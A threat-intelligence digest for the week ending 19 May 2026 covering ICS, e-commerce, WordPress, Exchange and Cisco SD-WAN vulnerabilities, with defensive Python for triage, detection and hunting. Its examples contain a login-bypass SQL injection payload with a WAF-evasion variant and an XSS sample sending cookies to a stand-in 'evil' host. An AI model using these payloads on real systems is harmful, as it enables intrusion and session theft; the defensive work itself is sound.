Threat Intel Weekly #20 — Week ending 19 May 2026
Threat Intel 2026-05-19

This week's digest covers 8 critical and 6 high-severity CVEs published between 2026-05-12 and 2026-05-19, plus 2 new CISA Known Exploited Vulnerabilities.

📅 Coverage period: 2026-05-12 → 2026-05-19 | 14 CVEs reviewed | 2 CISA KEV additions

🔴 Critical Vulnerabilities (CVSS ≥ 9.0)

🔴 CVE-2025-40949 (CVSS 9.1)

Product: Siemens RUGGEDCOM ROX — MX5000, MX5000RE, RX1400, RX1500, RX1501, RX1510, RX1511, RX1512, RX1524, RX1536, RX5000 (All versions < V2.17.1)
CWE: CWE-78 — Improper Neutralization of Special Elements used in an OS Command
Reported by: Emmanuel Zhou, Rick Wyble, Mehmet Balta, and Adam Robbie (Palo Alto Networks OT Threat Research Lab)

Severity: Critical | Attack Vector: NETWORK | Auth Required: Yes (authenticated remote attacker)

Technical Details:

Affected devices do not properly sanitize user-supplied input in the Scheduler functionality of the Web UI. Commands can be injected into the task scheduling backend, allowing an authenticated remote attacker to execute arbitrary commands with root privileges on the underlying Linux operating system. Unlike some authenticated command-injection flaws that require high-privilege accounts, this vulnerability can be triggered with valid — even limited — credentials.

RUGGEDCOM ROX devices are widely deployed as communication backbone nodes in power grids, oil refineries, manufacturing plants, transportation control cabinets, and electrical utility substations. Root-level code execution on these devices effectively hands an attacker full control over a hardened industrial router, enabling traffic interception, routing manipulation, credential extraction, and lateral movement deeper into the OT network.

Patch / Mitigation:

  • Update to RUGGEDCOM ROX firmware V2.17.1 or later — this is the only complete fix.
  • To verify your current version: log into the ROX Web Interface → Status → System Information → "Software Version," or via CLI: show system info. Any version string < 2.17.1 is vulnerable.
  • Note: RUGGEDCOM ROX (ROX II) is a separate platform from the older Rugged Operating System (ROS) used on switches like the RS900. This CVE does not apply to ROS.
  • Per CISA/Siemens guidance, while patching: restrict network access to the Web UI, enforce VPN/jump-host access controls, and disable unnecessary services (Telnet, FTP).
  • Follow Siemens operational guidelines for Industrial Security: https://www.siemens.com/cert/operational-guidelines-industrial-security
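Because "any version string < 2.17.1" is a numeric comparison, not a string one ("2.9.3" sorts after "2.17.1" lexically but is vulnerable), a triage script should parse the version before comparing. The script below is an added example, not Siemens tooling: it takes a constructed asset inventory (hostnames, platforms and versions are made up), skips ROS devices per the caveat above, and buckets ROX devices into patch / ok / review. The fixed version and the ROX-vs-ROS distinction are the only facts taken from the advisory.

```python
"""Triage a RUGGEDCOM ROX inventory against the V2.17.1 fix (CVE-2025-40949,
CVE-2025-40947, CVE-2025-40833). Added example; inventory is constructed."""
import re
from typing import Dict, List, NamedTuple, Optional, Tuple

FIXED = (2, 17, 1)  # first fixed ROX release per Siemens SSA-081142


class Device(NamedTuple):
    host: str
    platform: str  # "ROX" or "ROS" as recorded in the asset inventory
    version: str   # raw string as shown under Status -> System Information


VERSION_RE = re.compile(r"^[Vv]?(\d+)\.(\d+)(?:\.(\d+))?")


def parse_version(raw: str) -> Optional[Tuple[int, int, int]]:
    """Turn 'V2.16.2', '2.17.1' or 'v2.9' into a comparable int tuple.
    Returns None when the string is not a ROX-style version."""
    m = VERSION_RE.match(raw.strip())
    if not m:
        return None
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def is_vulnerable(dev: Device) -> Optional[bool]:
    """True = needs V2.17.1; False = fixed or not ROX; None = unparseable."""
    if dev.platform.upper() != "ROX":
        return False  # ROS switches (e.g. RS900) are out of scope for this CVE
    v = parse_version(dev.version)
    if v is None:
        return None
    # Tuple comparison, NOT string comparison: "2.9.0" < "2.17.1" is False
    # lexically but True numerically.
    return v < FIXED


def triage(inventory: List[Device]) -> Dict[str, List[str]]:
    """Bucket an inventory into patch / ok / review lists of hostnames."""
    out: Dict[str, List[str]] = {"patch": [], "ok": [], "review": []}
    for dev in inventory:
        res = is_vulnerable(dev)
        key = "review" if res is None else ("patch" if res else "ok")
        out[key].append(dev.host)
    return out


# Constructed inventory: hostnames, platforms and versions are made up.
INVENTORY = [
    Device("sub-a-rx1500", "ROX", "V2.16.2"),
    Device("sub-b-rx1400", "ROX", "2.17.1"),
    Device("sub-c-mx5000", "ROX", "v2.9.3"),
    Device("sub-d-rx1510", "ROX", "V2.17.2"),
    Device("sub-e-rs900", "ROS", "5.8.0"),
    Device("sub-f-rx5000", "ROX", "unknown"),
]

if __name__ == "__main__":
    for bucket, hosts in triage(INVENTORY).items():
        print(f"{bucket:7s} {', '.join(hosts) or '-'}")
```

Anything landing in "review" (unparseable version string) should be checked by hand rather than assumed safe.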

References: NVD · Siemens SSA-081142 · CISA ICSA-26-134-12

🔴 CVE-2025-6577 (CVSS 9.8)

Product: Akilli Commerce Software Technologies Ltd. Co. — E-Commerce Website (All versions before 4.5.001)
CWE: CWE-89 — Improper Neutralization of Special Elements used in an SQL Command (SQL Injection)
Disclosed: May 12, 2026

Severity: Critical | Attack Vector: NETWORK | Auth Required: None | Complexity: Low

Technical Details:

This is a pre-authentication, network-reachable SQL injection carrying the worst-case CVSS v3.1 vector, AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8): no credentials, no user interaction and no special conditions are required. An unauthenticated remote attacker sends crafted HTTP requests containing SQL syntax to the e-commerce application, and that syntax is passed to the backend database as part of a query.

Successful exploitation can lead to:

  • Full database exfiltration — customer PII, order history, payment references, and credentials
  • Data modification or deletion — manipulation of product listings, orders, or user accounts
  • Authentication bypass — logging in as any user, including administrators, by injecting SQL into login forms
  • In some configurations, code execution on the database host — via xp_cmdshell (MSSQL) or, on MySQL, SELECT ... INTO OUTFILE writing a web shell into a served directory (requires the FILE privilege)

The source advisory was published by the Turkish national cybersecurity authority (siberguvenlik.gov.tr) under TR-26-0222.
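The authentication-bypass item above is the cheapest thing to reproduce and the clearest illustration of why only parameterisation fixes this class. The following is an added example, not Akilli code: the users table, the login query and the credentials are invented, and it runs against an in-memory SQLite database. The same payload shape works against MySQL and MSSQL (the comment token differs slightly: MySQL needs a space after `--`).

```python
"""Login-form SQL injection (the CVE-2025-6577 bug class) beside its fix.
Added example with an invented schema; runs on an in-memory SQLite DB."""
import hashlib
import sqlite3
from typing import Optional, Tuple


def setup_db() -> sqlite3.Connection:
    """Constructed users table with one admin account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, pw_hash TEXT, role TEXT)")
    conn.execute(
        "INSERT INTO users VALUES (?, ?, ?)",
        ("admin", hashlib.sha256(b"N0tTheP@ss").hexdigest(), "admin"),
    )
    return conn


def login_vulnerable(conn, username: str, password: str) -> Optional[Tuple[str, str]]:
    """String-built query: attacker text becomes SQL syntax.
    With username = "admin'-- " the WHERE clause collapses to
    username = 'admin' and the password check is commented out."""
    h = hashlib.sha256(password.encode()).hexdigest()
    sql = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND pw_hash = '{h}'"
    )
    return conn.execute(sql).fetchone()


def login_fixed(conn, username: str, password: str) -> Optional[Tuple[str, str]]:
    """Parameterised query: the same payload is just a non-matching string."""
    h = hashlib.sha256(password.encode()).hexdigest()
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ? AND pw_hash = ?",
        (username, h),
    ).fetchone()


# Classic comment-out payload: closes the string literal, then comments out
# the rest of the statement. Trailing space keeps MySQL's "-- " form happy.
PAYLOAD = "admin'-- "

if __name__ == "__main__":
    db = setup_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "anything"))
    print("fixed:     ", login_fixed(db, PAYLOAD, "anything"))
```

A WAF would catch this exact string, which is why it is a stopgap: `'/**/OR/**/1=1--` and a hundred other encodings reach the same concatenated query.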

Patch / Mitigation:

  • Upgrade to E-Commerce Website version 4.5.001 or later immediately — there is no configuration workaround for a pre-authentication SQL injection.
  • Until patched, consider placing the application behind a Web Application Firewall (WAF) with SQL injection rules enabled.
  • Audit database accounts used by the application and enforce the principle of least privilege — the app's DB user should not have DROP, EXECUTE, or OS-level permissions.
  • Review database logs for anomalous query patterns that may indicate prior exploitation.
  • Rotate all credentials stored in the application database.

References: NVD · Mondoo Intelligence · Turkish CERT Advisory TR-26-0222

🔴 CVE-2026-22924 (CVSS 9.1)

Product: Siemens SIMATIC CN 4100 (All versions < V5.0)
CWE: CWE-400 — Uncontrolled Resource Consumption (Resource Exhaustion) / Improper Restriction of Unauthenticated Connections
Advisory: Siemens SSA (May 12, 2026) · CISA ICSA-26-134-10 (May 14, 2026)

Severity: Critical | Attack Vector: NETWORK | Auth Required: None

Technical Details:

The SIMATIC CN 4100 communication node — a compact industrial PC used to interface SIMATIC controllers with IT/cloud infrastructure — does not properly restrict unauthenticated network connections. The vulnerability enables resource exhaustion attacks that can be triggered remotely without credentials.

An attacker who can reach the device over the network can flood it with crafted connection requests, overwhelming its connection-handling subsystem. This can result in:

  • Denial of service (DoS) — disrupting legitimate communication between the CN 4100 and connected SIMATIC controllers, effectively cutting off industrial process monitoring and control signals
  • Unauthorized actions — in certain conditions, the improper connection handling may permit an unauthenticated attacker to perform limited unauthorized operations on the system

This vulnerability is especially concerning because the SIMATIC CN 4100 acts as a bridge between OT and IT/cloud layers. Disrupting it can cascade into loss of visibility or control over upstream industrial processes. Siemens and CISA noted that this CN 4100 advisory bundles over 300 third-party component vulnerabilities alongside CVE-2026-22924, all addressed by upgrading to V5.0.

Patch / Mitigation:

  • Update SIMATIC CN 4100 to firmware V5.0 or later: Siemens Support Portal
  • As a short-term compensating control, place the CN 4100 on an isolated network segment and restrict access to the device's network ports from untrusted hosts using firewall rules.
  • Disable any unnecessary remote-access services.
  • Monitor device logs and network traffic for abnormal connection-rate anomalies targeting the device.
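For the last bullet, the useful signal is the per-source rate of new connections to the device, not total volume. Below is an added example, not Siemens tooling, of a sliding-window rate detector run over constructed flow records; the log line format, the device address, the window and the threshold are assumptions to be replaced with your segment firewall's export and a baseline measured from your own SCADA pollers.

```python
"""Sliding-window connection-rate alert for a device such as the CN 4100.
Added example; the flow-log format and all addresses are constructed."""
from collections import defaultdict, deque
from typing import Deque, Dict, Iterable, List, Optional, Tuple

DEVICE_IP = "10.20.30.40"   # constructed: the CN 4100 under observation
WINDOW = 10.0               # seconds
THRESHOLD = 20              # new connections per window per source


def parse_flow(line: str) -> Optional[Tuple[float, str, str]]:
    """Constructed format: '<epoch> <src_ip> -> <dst_ip>:<dst_port> SYN'.
    Returns (ts, src_ip, dst_ip) or None for lines that do not match."""
    parts = line.split()
    if len(parts) != 5 or parts[2] != "->" or parts[4] != "SYN":
        return None
    ts, src, dst = float(parts[0]), parts[1], parts[3].rsplit(":", 1)[0]
    return ts, src, dst


def detect(lines: Iterable[str], device_ip: str = DEVICE_IP,
           window: float = WINDOW, threshold: int = THRESHOLD) -> List[Tuple[str, float]]:
    """Return (src_ip, first_alert_ts) for every source that opens more than
    `threshold` connections to `device_ip` within any `window` seconds."""
    recent: Dict[str, Deque[float]] = defaultdict(deque)  # src -> timestamps
    alerts: List[Tuple[str, float]] = []
    alerted = set()
    for line in lines:
        rec = parse_flow(line)
        if rec is None or rec[2] != device_ip:
            continue
        ts, src, _ = rec
        q = recent[src]
        q.append(ts)
        while q and ts - q[0] > window:   # drop timestamps outside the window
            q.popleft()
        if len(q) > threshold and src not in alerted:
            alerted.add(src)              # one alert per source, at first breach
            alerts.append((src, ts))
    return alerts


def sample_log() -> List[str]:
    """Constructed traffic: a SCADA poller at 1 conn/s and a flooder at 50/s."""
    lines = []
    for i in range(30):                                  # legitimate poller
        lines.append(f"{1000 + i}.0 10.20.30.5 -> {DEVICE_IP}:443 SYN")
    for i in range(200):                                 # flood from 192.0.2.9
        lines.append(f"{1010 + i * 0.02:.2f} 192.0.2.9 -> {DEVICE_IP}:443 SYN")
    lines.append("garbage line")                         # ignored by parser
    return lines


if __name__ == "__main__":
    for src, ts in detect(sample_log()):
        print(f"ALERT {src} exceeded {THRESHOLD} conns/{WINDOW:.0f}s at t={ts}")
```

Tune THRESHOLD from a week of normal polling rather than guessing; industrial pollers are very regular, so a small multiple of the observed peak is usually a safe line.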

References: NVD · CISA ICSA-26-134-10 · SecurityWeek — May 2026 ICS Patch Tuesday

🔴 CVE-2026-25786 (CVSS 9.1)

Product: Siemens SIMATIC S7 series — devices with web interface (exact model list per Siemens SSA)
CWE: CWE-79 — Improper Neutralization of Input During Web Page Generation (Stored Cross-Site Scripting)
Advisory: May 2026 Siemens Patch Tuesday

Severity: Critical | Attack Vector: NETWORK | Auth Required: Yes (must be authorized to download TIA projects)

Technical Details:

The affected Siemens SIMATIC S7 devices do not properly validate or sanitize PLC/station names rendered on the "Communication Parameters" page of the device's web interface. An attacker who holds valid credentials and is authorized to download a TIA (Totally Integrated Automation) Portal project into the device can embed malicious JavaScript payloads within a PLC or station name field in the TIA project file.

When a victim — such as an engineer or plant operator — navigates to the Communication Parameters page in their browser, the injected script executes in the context of that user's authenticated web session. Depending on the victim's privileges, this stored XSS can be used to:

  • Steal session tokens — hijacking the victim's authenticated session entirely
  • Perform unauthorized actions on the device on behalf of the victim
  • Pivot laterally by harvesting credentials from the browser session to reach other OT assets

In operational environments where engineers browse multiple PLC interfaces during maintenance windows, a single compromised project file can silently target many users. SecurityWeek noted this as one of several critical flaws Siemens addressed in the May 2026 Patch Tuesday across the SIMATIC S7 web server family.

Patch / Mitigation:

  • Apply the firmware update specified in Siemens' SSA advisory for your exact SIMATIC product/model.
  • Validate and audit all TIA project files before loading them onto devices, especially files received from third parties or via email.
  • Restrict web interface access to engineering workstations on isolated, trusted VLANs.
  • Enforce MFA on all accounts authorized to download TIA projects.
  • Monitor for unexpected web-UI access patterns or session anomalies after project uploads.

References: NVD · Siemens ProductCERT Portal · SecurityWeek ICS Patch Tuesday

🔴 CVE-2026-25787 (CVSS 9.1)

Product: Siemens SIMATIC S7 series — devices with Motion Control web interface
CWE: CWE-79 — Improper Neutralization of Input During Web Page Generation (Stored Cross-Site Scripting)
Advisory: May 2026 Siemens Patch Tuesday

Severity: Critical | Attack Vector: NETWORK | Auth Required: Yes (must be authorized to download TIA projects)

Technical Details:

This vulnerability is closely related to CVE-2026-25786 but targets a different web UI page and a different data field. Affected devices do not properly validate or sanitize Technology Object (TO) names rendered on the "Motion Control Diagnostics" page of the web interface.

Just as with CVE-2026-25786, an attacker authorized to upload a TIA project can craft a malicious Technology Object name containing JavaScript. The payload persists within the device and executes in the context of any user who visits the Motion Control Diagnostics page. This is a stored (persistent) XSS — unlike reflected XSS, it does not require tricking the victim into clicking a specially crafted link; simply browsing to the diagnostics page is sufficient.

In motion-control-heavy environments (automotive assembly, robotics, CNC machining), the Motion Control Diagnostics page is frequently accessed by technicians during calibration and troubleshooting, making this a high-traffic attack surface.

The impact is identical to CVE-2026-25786: session hijacking, unauthorized device actions, and potential lateral movement.

Patch / Mitigation:

  • Same remediation path as CVE-2026-25786 — apply the firmware update from the Siemens SSA advisory.
  • Treat both CVE-2026-25786 and CVE-2026-25787 as a paired risk — if your device is affected by one, it is likely affected by both.
  • Apply the same supply-chain hygiene controls for TIA project files: validate provenance before deploying any project to production devices.
  • Limit access to the Motion Control Diagnostics page to a minimum set of authorized personnel on trusted network segments.
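Both CVEs reduce to the same defect: a name taken from the project is written into HTML without output encoding. The block below is an added example, not Siemens tooling, that serves the "validate TIA project files" bullets for CVE-2026-25786 and CVE-2026-25787 at once. Real TIA projects are a proprietary format, so it assumes the station and Technology Object names have been exported to a flat XML (a constructed sample is embedded) and applies a conservative allow-list to each name; it also shows the raw rendering next to the escaped rendering the device web server should have used.

```python
"""Audit station / Technology Object names for markup before a TIA download,
and contrast raw vs. encoded rendering. Added example; the export is constructed."""
import html
import re
import xml.etree.ElementTree as ET
from typing import List, Tuple

# Constructed export: one clean station, one clean TO, and two poisoned names
# (XML-escaped here so the file itself is well-formed).
SAMPLE_EXPORT = """<Project>
  <Station Name="Press_Line_3"/>
  <Station Name="PLC_07&lt;script&gt;fetch('//evil/'+document.cookie)&lt;/script&gt;"/>
  <TechnologyObject Name="Axis_X1"/>
  <TechnologyObject Name="Axis_Y&quot; onmouseover=&quot;alert(1)"/>
</Project>"""

# A name never needs '<', '"', '=' or ';' to do its job; reject anything else
# outright instead of trying to strip "dangerous" substrings.
SAFE_CHAR = re.compile(r"[A-Za-z0-9_\-. ]")
SAFE_NAME = re.compile(r"^[A-Za-z0-9_\-. ]{1,64}$")


def audit_names(xml_text: str) -> List[Tuple[str, str, str]]:
    """Return (element_tag, name, reason) for every name that fails policy."""
    findings = []
    root = ET.fromstring(xml_text)
    for el in root.iter():
        name = el.get("Name")
        if name is None:
            continue
        if not SAFE_NAME.match(name):
            bad = sorted({c for c in name if not SAFE_CHAR.match(c)})
            findings.append((el.tag, name, "disallowed chars: " + "".join(bad)))
    return findings


def render_vulnerable(name: str) -> str:
    """What the affected pages effectively did: raw name into the HTML body."""
    return f"<td>{name}</td>"


def render_fixed(name: str) -> str:
    """Context-aware output encoding: markup becomes inert text."""
    return f"<td>{html.escape(name, quote=True)}</td>"


if __name__ == "__main__":
    for tag, name, why in audit_names(SAMPLE_EXPORT):
        print(f"REJECT {tag} {name!r}: {why}")
        print("   raw   :", render_vulnerable(name))
        print("   fixed :", render_fixed(name))
```

The allow-list check is a deploy-time gate for your engineering workflow; it does not replace the firmware update, because an attacker who can download a project does not go through your script.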

References: NVD · Siemens ProductCERT Portal · SecurityWeek ICS Patch Tuesday

🟠 High Severity Vulnerabilities (CVSS 7.0–8.9)

🟠 CVE-2026-2993 (CVSS 7.5)
Summary: SQL injection in the AI Chatbot & Workflow Automation by AIWU WordPress plugin.
Analysis: Network-reachable SQLi in a WordPress plugin; check whether the plugin is installed and update to the patched version. If the vector is unauthenticated (AV:N/AC:L/PR:N/UI:N), a 7.5 score corresponds to a single High impact, most likely confidentiality only, so expect data read-out rather than the full compromise of CVE-2025-6577. Audit your WordPress plugin inventory.

🟠 CVE-2026-6690 (CVSS 7.2)
Summary: Stored XSS via the n parameter in the LifePress WordPress plugin.
Analysis: Stored XSS allows persistent script injection affecting every visitor to the affected pages. Update the LifePress plugin and, if it was installed on a public-facing site, audit for malicious content already injected.

🟠 CVE-2025-40833 (CVSS 7.5)
Summary: Null pointer dereference in affected Siemens RUGGEDCOM ROX devices triggered by specially crafted packets.
Analysis: A denial-of-service vector via malformed packets; an unauthenticated attacker could crash a ROX device remotely. Remediated by the same firmware V2.17.1 update that addresses CVE-2025-40949. Prioritise patching if these devices are internet-reachable.

🟠 CVE-2025-40946 (CVSS 8.3)
Summary: Vulnerability in blueplanet 100 NX3 M8 (all versions) and the blueplanet 100 TL3 GEN2 series; no fixed version confirmed at time of publishing.
Analysis: An 8.3 with no fixed firmware available is a serious situation for operators. Apply network-layer controls to isolate affected devices while monitoring vendor advisories for patch availability.

🟠 CVE-2025-40947 (CVSS 7.5)
Summary: Authenticated command injection in the RUGGEDCOM ROX feature key installation process (all versions < V2.17.1).
Analysis: An attacker with valid credentials can upload a crafted feature key file to achieve OS command execution; the feature key handler fails to sanitise user input before passing it to system commands. Fix: update to RUGGEDCOM ROX firmware V2.17.1.

🚨 CISA Known Exploited Vulnerabilities — Added This Week

The following vulnerabilities were added to CISA's Known Exploited Vulnerabilities Catalog this week, meaning CISA has evidence of active exploitation in the wild:

  • CVE-2026-42897 · Microsoft Exchange Server (on-prem: SE RTM, 2019, 2016) · Exchange Server OWA cross-site scripting / spoofing vulnerability: a crafted email triggers arbitrary JavaScript execution in the victim's browser · Due date: 2026-05-29
  • CVE-2026-20182 · Cisco Catalyst SD-WAN Controller (formerly vSmart) and Manager (formerly vManage) · Authentication bypass via broken peering authentication: an unauthenticated remote attacker gains admin privileges · Due date: 2026-05-17

Federal agencies must remediate these by the due dates listed. Non-federal organizations are strongly encouraged to prioritize these as well.

🚨 KEV Deep-Dive: CVE-2026-42897 — Microsoft Exchange Server OWA XSS (Zero-Day)

CVSS: 8.1 (High) | CWE: CWE-79 | Exploit Status: Actively exploited in the wild — zero-day, no permanent patch yet

What happened: Microsoft disclosed CVE-2026-42897 on May 15, 2026, three days after its May Patch Tuesday (May 12) which addressed 120+ other vulnerabilities, after detecting active exploitation. An anonymous researcher discovered and reported the flaw. CISA added it to the KEV catalog the same day with a two-week federal remediation deadline (May 29, 2026).

How it works: The vulnerability resides in Outlook on the web (OWA), the browser-based email interface for on-premises Exchange Server. An unauthenticated attacker sends a specially crafted email to a target. When the victim opens it in OWA and certain interaction conditions are met, attacker-controlled JavaScript executes in the context of the victim's authenticated browser session. This can be used to hijack the session, steal tokens, read mailbox contents, and perform actions on behalf of the victim, all without the attacker holding Exchange credentials of their own.

Affected versions: Exchange Server Subscription Edition RTM, 2019, and 2016 (on-premises only). Exchange Online is NOT affected.

Why it matters: Exchange servers sit at the center of enterprise communications, authentication workflows, and sensitive business data. CISA's KEV catalog currently lists nearly two dozen Exchange flaws — several weaponized by ransomware groups including Hive, LockBit, and Cuba. Because a permanent patch is not yet available, the risk window is open.

Immediate mitigations:

  • Enable and verify the Exchange Emergency Mitigation Service (EEMS) — it is on by default and automatically applies a URL rewrite that blocks the XSS attack vector. Confirm it is running and that the CVE-2026-42897 mitigation has been applied.
  • For restricted/air-gapped networks: use the Exchange On-premises Mitigation Tool (EOMT) with the CVE-2026-42897 script.
  • Restrict OWA exposure — do not expose Exchange OWA directly to the internet if avoidable.
  • Monitor for suspicious email patterns, unusual OWA session activity, and anomalous mailbox actions.
  • Apply Microsoft's permanent security update as soon as it becomes available.

References: The Hacker News · Help Net Security · SecurityWeek · Security Affairs

🚨 KEV Deep-Dive: CVE-2026-20182 — Cisco Catalyst SD-WAN Authentication Bypass (CVSS 10.0)

CVSS: 10.0 (Critical — Maximum) | CWE: CWE-287 — Improper Authentication | Exploit Status: Actively exploited — attributed to UAT-8616, a nation-state-level threat actor

What happened: Rapid7 researchers Stephen Fewer and Jonah Burgess discovered this flaw while studying a related prior vulnerability (CVE-2026-20127). Rapid7 disclosed it to Cisco on March 9, 2026. Cisco confirmed exploitation in May 2026 and released fixes. CISA added CVE-2026-20182 to the KEV catalog on May 14, 2026, with a tight two-day federal remediation window (deadline: May 17, 2026).

How it works: The vulnerability lies in the vdaemon service over DTLS (UDP port 12346) — the control-plane peering port used for inter-controller and controller-to-edge communication in SD-WAN fabrics. During the authentication handshake, when a connecting peer claims to be a vHub device (device type 2), device-type-specific certificate verification is skipped, yet the peer is still marked as authenticated. This logic flaw allows a remote unauthenticated attacker to become a fully trusted control-plane peer, then perform privileged operations including injecting SSH keys into the vmanage-admin user account.

Post-exploitation (UAT-8616 TTPs, per Cisco Talos):

  • Added unauthorized SSH keys
  • Modified NETCONF configurations
  • Attempted root privilege escalation
  • Infrastructure overlaps with Operational Relay Box (ORB) networks used for obfuscation

Independently of this actor, a public Metasploit module is already available for the CVE, so exploitation is within reach of far less capable attackers.

Affected products: Cisco Catalyst SD-WAN Controller and Manager — on-premises, Cloud-Pro, Cisco Managed Cloud, and FedRAMP deployments. Configuration-independent: no deployment settings protect against this.

Why it matters: The SD-WAN controller is the central control plane of the entire SD-WAN fabric. Compromising it means an attacker can intercept, reroute, or blackhole traffic across the entire enterprise WAN. There are no workarounds — only patching fixes this. A public PoC exists and multiple threat clusters (at least 10 tracked by Cisco Talos) are already exploiting related SD-WAN flaws. Talos also warns of chained exploitation of CVE-2026-20133, CVE-2026-20128, and CVE-2026-20122 in combination for unauthenticated remote access, active since March 2026.

Immediate actions:

  1. Upgrade Cisco Catalyst SD-WAN Controller and Manager to a fixed release immediately — consult Cisco's advisory for your specific release train.
  2. Before upgrading, run request admin-tech on each control component and collect logs for Cisco TAC review.
  3. Examine /var/log/auth.log for entries like Accepted publickey for vmanage-admin from [unknown IP].
  4. Review all control-connection peering events in SD-WAN logs — focus on unexpected vmanage peer types or connections from unfamiliar IPs.
  5. Open a Cisco TAC case (Severity 3, include CVE-2026-20182 in the title) if you suspect compromise.
  6. Follow CISA Emergency Directive 26-03 and the associated Hunt & Hardening Guidance for Cisco SD-WAN Devices.
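Steps 3 and 4 are the part of this procedure that can be scripted against the logs you collect in step 2. The following is an added example, not Cisco tooling, that looks for the two artefacts of the UAT-8616 TTPs described above: public-key logins as vmanage-admin from outside your management allow-list in auth.log, and authorized_keys entries that were not in your baseline copy, compared by OpenSSH-style SHA256 fingerprint. The log lines, the key blobs, the allow-list and the baseline are all constructed and must be replaced with your own.

```python
"""Hunt for CVE-2026-20182 post-exploitation artefacts in auth.log and
authorized_keys. Added example; all data below is constructed."""
import base64
import hashlib
import re
from typing import List, Tuple

KNOWN_MGMT_IPS = {"10.0.100.5", "10.0.100.6"}   # assumed jump hosts

# Constructed auth.log excerpt: one normal key login, one from an unknown IP.
AUTH_LOG = """\
May 14 02:11:03 vmanage sshd[2210]: Accepted password for admin from 10.0.100.5 port 51022 ssh2
May 14 02:13:41 vmanage sshd[2231]: Accepted publickey for vmanage-admin from 10.0.100.6 port 49812 ssh2: ED25519 SHA256:AAAA
May 14 03:07:19 vmanage sshd[2299]: Accepted publickey for vmanage-admin from 203.0.113.77 port 40111 ssh2: ED25519 SHA256:BBBB
May 14 03:07:30 vmanage sshd[2301]: Failed password for root from 203.0.113.77 port 40118 ssh2
"""

LOGIN_RE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Accepted (\w+) for (\S+) from (\S+) port"
)


def suspicious_logins(log_text: str, user: str = "vmanage-admin",
                      allow=KNOWN_MGMT_IPS) -> List[Tuple[str, str]]:
    """(timestamp, src_ip) for public-key logins as `user` from IPs not in `allow`."""
    hits = []
    for line in log_text.splitlines():
        m = LOGIN_RE.match(line)
        if not m:
            continue
        ts, method, u, ip = m.groups()
        if u == user and method == "publickey" and ip not in allow:
            hits.append((ts, ip))
    return hits


def _blob(tag: bytes) -> str:
    """Constructed stand-in for a key blob; only its bytes matter here."""
    raw = b"\x00\x00\x00\x0bssh-ed25519" + tag.ljust(36, b"\x00")
    return base64.b64encode(raw).decode()


# Baseline = a copy taken before the incident; current = the file on the box.
BASELINE_KEYS = (f"ssh-ed25519 {_blob(b'ops-key-1')} ops@jump1\n"
                 f"ssh-ed25519 {_blob(b'ops-key-2')} ops@jump2\n")
CURRENT_KEYS = BASELINE_KEYS + f"ssh-ed25519 {_blob(b'injected')} \n"


def fingerprint(key_line: str) -> str:
    """OpenSSH-style SHA256 fingerprint of a 'type blob [comment]' line
    (assumes no options prefix on the line)."""
    blob = base64.b64decode(key_line.split()[1])
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def new_keys(baseline_text: str, current_text: str) -> List[Tuple[str, str]]:
    """(fingerprint, line) for keys present now but absent from the baseline."""
    base = {fingerprint(l) for l in baseline_text.splitlines() if l.strip()}
    return [(fingerprint(l), l) for l in current_text.splitlines()
            if l.strip() and fingerprint(l) not in base]


if __name__ == "__main__":
    for ts, ip in suspicious_logins(AUTH_LOG):
        print(f"LOGIN  {ts} vmanage-admin via publickey from {ip} (not in allow-list)")
    for fp, line in new_keys(BASELINE_KEYS, CURRENT_KEYS):
        print(f"NEWKEY {fp}  {line.strip()}")
```

Compare fingerprints, not raw lines: a re-wrapped or re-commented key is still the same key, and an attacker may copy the comment of a legitimate entry.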

References: Cisco Advisory · Rapid7 Disclosure · Cisco Talos · The Hacker News · SOCRadar

📌 This Week's TL;DR

  1. Patch CVE-2026-20182 (CVSS 10.0) NOW — Cisco SD-WAN auth bypass with a public Metasploit module, actively exploited by UAT-8616 (nation-state level). No workarounds. Federal deadline was May 17. If you haven't patched, assume you may already be compromised, collect admin-tech logs and open a TAC case.

  2. Mitigate CVE-2026-42897 immediately, patch when available — Exchange Server zero-day with active exploitation, no permanent patch yet. Enable EEMS now. On-prem Exchange only; Exchange Online is not affected. Federal deadline is May 29.

  3. Patch all RUGGEDCOM ROX devices to V2.17.1 — Addresses CVE-2025-40949 (root command injection via Scheduler, CVSS 9.1), CVE-2025-40947 (command injection via feature key, CVSS 7.5), and CVE-2025-40833 (null pointer DoS, CVSS 7.5) in a single firmware update. Critical infrastructure operators should treat this as an emergency change.

  4. Update SIMATIC CN 4100 to V5.0 — Resolves CVE-2026-22924 (unauthenticated resource exhaustion, CVSS 9.1) and over 300 bundled third-party component CVEs. The CN 4100 bridges OT and IT/cloud; disrupting it can cascade into loss of industrial process visibility.

  5. Patch SIMATIC S7 web interfaces for CVE-2026-25786 and CVE-2026-25787 — Paired stored XSS vulnerabilities in TIA project-rendered web pages. An engineer browsing the Communication Parameters or Motion Control Diagnostics page is silently targeted. Audit TIA project provenance and apply Siemens' firmware update.

  6. CVE-2025-6577 (CVSS 9.8) — SQL Injection in Akilli E-Commerce — Pre-auth, no-complexity SQLi with full CIA impact. Upgrade to version 4.5.001 immediately. If you use this platform, rotate all database credentials and review logs for signs of prior exfiltration.

Next edition publishes next Friday. Have a threat feed, IOC, or CVE you want covered? Reach me at the contact page.

Tags

#CVE #WordPress #RCE #CISA-KEV #ActiveExploitation